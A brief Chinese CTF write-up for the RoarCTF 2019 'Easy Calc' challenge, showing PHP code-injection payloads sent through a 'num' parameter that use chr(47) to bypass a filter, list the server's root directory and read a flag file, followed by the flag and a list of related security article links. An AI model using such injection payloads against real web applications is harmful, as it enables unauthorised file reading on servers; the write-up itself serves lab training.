BUUCTF---[RoarCTF 2019]Easy Calc1

1.题目描述

2.搜索网址是一个计算器,输入正常的运算,可以运算

3.查看源码,发现有一个calc.php

4.访问calc.php,代码提示用get方式传输num参数,但是过滤了\等等。

5.构造play load,发现了一个f1agg.

复制代码
num=print_r(scandir(chr(47)))

chr(47)是"/"的ASCII编码

scandir()是用来扫描文件目录

print_r是将扫描结果打印出来

6.尝试访问f1agg

复制代码
num=print_r(file_get_contents(chr(47).f1agg))

file_get_conctents()用来读取f1agg里面的内容,最后print_r将内容输出

7.

复制代码
flag{de45bb5f-1b75-4b33-99fb-904f876df79f} 
相关推荐
C2H5OH10 小时前
PortSwigger SQL注入LAB2
网络安全
Chockmans15 小时前
春秋云境CVE-2019-9618
安全·web安全·网络安全·系统安全·网络攻击模型·春秋云境·cve-2019-9618
酿情师15 小时前
Shiro 反序列化漏洞原理(小白零基础详解)
java·web安全·网络安全
wanhengidc16 小时前
流量清洗的作用是什么?
运维·服务器·网络·安全·web安全·智能手机
vortex517 小时前
基于开发关键词的子域名Fuzz方法
网络安全
一名优秀的码农17 小时前
vulhub系列-46-dGears of War: EP#1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
jerryinwuhan17 小时前
网络安全相关制度
网络·安全·web安全
网络安全许木17 小时前
自学渗透测试第16天(Linux文本处理进阶)
linux·运维·服务器·网络安全·渗透测试
zjeweler17 小时前
“网安+护网”终极300多问题面试笔记-1共3-内网&域相关
笔记·web安全·网络安全·面试·职场和发展·护网面试
介一安全18 小时前
【Web安全】PHP内置Web服务器SSRF漏洞:从原理到实战利用全解析
web安全·网络安全·php·安全性测试